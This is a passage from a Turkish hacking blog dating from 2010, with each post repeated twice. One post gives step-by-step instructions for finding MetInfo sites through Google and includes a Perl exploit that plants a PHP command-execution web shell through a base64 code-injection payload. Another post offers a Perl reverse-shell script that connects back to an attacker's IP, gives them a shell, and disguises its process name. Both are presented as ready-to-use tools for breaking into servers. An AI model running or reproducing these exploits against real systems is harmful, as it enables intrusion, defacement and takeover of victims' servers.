31 Ekim 2010 Pazar

MetInfo Php Code İnjection

Hack huck işlerine bir müddet ara verip ticarete atıldım bunları yakınımda olanlar bilir :) bu sebeble blogumuda baya boşladım.. 1 - 2 paylaşım yapayım dedim gece gece..

Gelelim bugun kullanımına :
1. : Googlede : Powered by MetInfo aratıyoruz.
2.: Asagıda verdigim kodları notapede koyup env.pl gibi kaydediyoruz.
3.: Elimizde var olan herhangi bir Shell soktugumuz unix sunucuya env.pl dosyamızı atıyoruz.
4.: Shellimizde komut satırına gelip 1. kuralda yaptıgımız arama sonucunda googlede çıkan sitelerden birine giriyoruz
5.: perl env.pl  site.com gibi çalıştırıyoruz
6.:  site:com/templates/test.php?cmd=id gibi urlde çagırıyoruz..
7.: Sonrası Egonuza kalmış :)

#!/usr/bin/env perl
use LWP::UserAgent;
die "Usage: $0 Ex:$0 victim.com\n" unless($ARGV[0]);
my $victim = $ARGV[0];
$user_agent = new LWP::UserAgent;
$vul_request = new HTTP::Request('GET',"http://$victim/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIHBhc3N0aHJ1KCRfR0VUW2NtZF0pPz4nKTs=");
# fputs(fopen('../templates/test.php','w+'),'');
$user_agent->request($vul_request);
$response = $user_agent->request(new HTTP::Request('GET',"http://$victim/templates/test.php"));
if($response->is_success)
{
    print "code injection successful ! plz look at http://$victim/templates/test.php?cmd=id";
}
else
{
print "could not connect to $victim";
}

MetInfo Php Code İnjection

Hack huck işlerine bir müddet ara verip ticarete atıldım bunları yakınımda olanlar bilir :) bu sebeble blogumuda baya boşladım.. 1 - 2 paylaşım yapayım dedim gece gece..

Gelelim bugun kullanımına :
1. : Googlede : Powered by MetInfo aratıyoruz.
2.: Asagıda verdigim kodları notapede koyup env.pl gibi kaydediyoruz.
3.: Elimizde var olan herhangi bir Shell soktugumuz unix sunucuya env.pl dosyamızı atıyoruz.
4.: Shellimizde komut satırına gelip 1. kuralda yaptıgımız arama sonucunda googlede çıkan sitelerden birine giriyoruz
5.: perl env.pl  site.com gibi çalıştırıyoruz
6.:  site:com/templates/test.php?cmd=id gibi urlde çagırıyoruz..
7.: Sonrası Egonuza kalmış :)

#!/usr/bin/env perl
use LWP::UserAgent;
die "Usage: $0 Ex:$0 victim.com\n" unless($ARGV[0]);
my $victim = $ARGV[0];
$user_agent = new LWP::UserAgent;
$vul_request = new HTTP::Request('GET',"http://$victim/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIHBhc3N0aHJ1KCRfR0VUW2NtZF0pPz4nKTs=");
# fputs(fopen('../templates/test.php','w+'),'');
$user_agent->request($vul_request);
$response = $user_agent->request(new HTTP::Request('GET',"http://$victim/templates/test.php"));
if($response->is_success)
{
    print "code injection successful ! plz look at http://$victim/templates/test.php?cmd=id";
}
else
{
print "could not connect to $victim";
}

Uzun zaman

uzun zamandır birşeyler yazmıyordum hatta blogu bile aklımdan çıkarmıştım  iş güç yüzünden aklıma gelmişken yazayım dedim ve YAZDIM...! xDehü

Uzun zaman

uzun zamandır birşeyler yazmıyordum hatta blogu bile aklımdan çıkarmıştım  iş güç yüzünden aklıma gelmişken yazayım dedim ve YAZDIM...! xDehü

4 Ekim 2010 Pazartesi

Linux Ters Baglanti Shell ( Back Connect )

 Diger socket exploitlere göre biraz daha farklıdır fazla laf insanı kasar ben paylaştım kullanan arkadaşlar farkı görcektir zaten..  en önemlisi diger socket exploitler cpanelden atılan ters baglantılarda ( Back Connect )  çalışmıyordu bunda %100 demiyorum %99 çalışcak.. aşagıda verdigim exploiti bir notaped içine yapıştırın ve uzantısı .pl olcak şekilde socket.pl gibi kaydedin sonra shell soktugunuz sunucuya atın %99 ms-dos ekranına baglanacaksınız

#!/usr/bin/perl
#Turkish Defacer Linux Ters Baglanti Shell         
#Modifiyed by: ByEge
#Site : byege.blogspot.com                                       
#Kullanımı: perl socket.pl [senin ip] [senin Port]
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Linux Ters Baglanti Shell ( Back Connect )

 Diger socket exploitlere göre biraz daha farklıdır fazla laf insanı kasar ben paylaştım kullanan arkadaşlar farkı görcektir zaten..  en önemlisi diger socket exploitler cpanelden atılan ters baglantılarda ( Back Connect )  çalışmıyordu bunda %100 demiyorum %99 çalışcak.. aşagıda verdigim exploiti bir notaped içine yapıştırın ve uzantısı .pl olcak şekilde socket.pl gibi kaydedin sonra shell soktugunuz sunucuya atın %99 ms-dos ekranına baglanacaksınız

#!/usr/bin/perl
#Turkish Defacer Linux Ters Baglanti Shell         
#Modifiyed by: ByEge
#Site : byege.blogspot.com                                       
#Kullanımı: perl socket.pl [senin ip] [senin Port]
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);